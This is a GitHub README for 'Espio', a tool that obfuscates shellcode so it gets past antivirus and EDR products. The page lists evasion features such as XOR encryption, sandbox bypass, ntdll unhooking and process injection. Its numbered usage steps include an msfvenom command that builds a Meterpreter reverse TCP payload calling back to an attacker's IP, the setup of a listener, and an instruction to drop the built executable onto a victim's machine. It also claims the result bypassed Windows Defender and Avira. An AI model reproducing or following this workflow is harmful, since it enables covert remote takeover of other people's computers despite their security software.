Skip to content

Shellcode obfuscation tool to avoid AV/EDR.

License

Notifications You must be signed in to change notification settings

Konis-Bros/espio

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

57 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Espio (For Educational Purposes Only)

Shellcode obfuscation tool to avoid AV/EDR.

Python 3.10.4 C++ 14 License: MIT

Features

  • Obfuscation - base64 encoding and XOR encryption with a randomly generated key.
  • Sandbox Bypass - custom sleep function.
  • DLL Unhooking - full unhook of ntdll.dll.
  • Process Injection - injecting the payload to werfault.exe.

Requirements

Espio requires Python3 and Visual Studio to use.

Usage

  1. Clone the repository:
git clone https://github.com/Konis-Bros/Espio.git
  1. Generate the shellcode. In this demonstration we will be using msfvenom in a kali machine:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<Attacker IP> LPORT=1337 -f raw -o shellcode
  1. Put the shellcode in the cloned repository and use the obfuscator.py tool to obfuscate it:
python3 obfuscator.py shellcode

Note: Our shellcode then be obfuscated to obfuscatedPayload.bin with the key.bin key and saved in loader/Espio.

  1. Open loader/Espio.sln, the Visual Studio solution file.

  2. Build The project. Note that the executable file will be located at loader/x64/Debug/Espio.exe.

  3. On the attacker's machine, listen for TCP connections on the defined port. In our case, run metasploit's multi/handler on port 1337.

  4. Drop the executable onto the victim's machine and run it.

Recommendations

  • In step 2 and 6, create meterpreter session over HTTPS. For more information see Meterpreter HTTP/HTTPS Communication.
  • In step 5, change the build configuration from Debug to Release. Note that the executable file will now be located at loader/x64/Release/Espio.exe.

Tests

Espio was examined against:

Windows Defender:

Defeder Bypass

Avira Prime:

Avira Bypass

ANTISCAN:

ANTISCAN

Authors and Acknowledgments

License

Distributed under the MIT License. See LICENSE.txt for more information.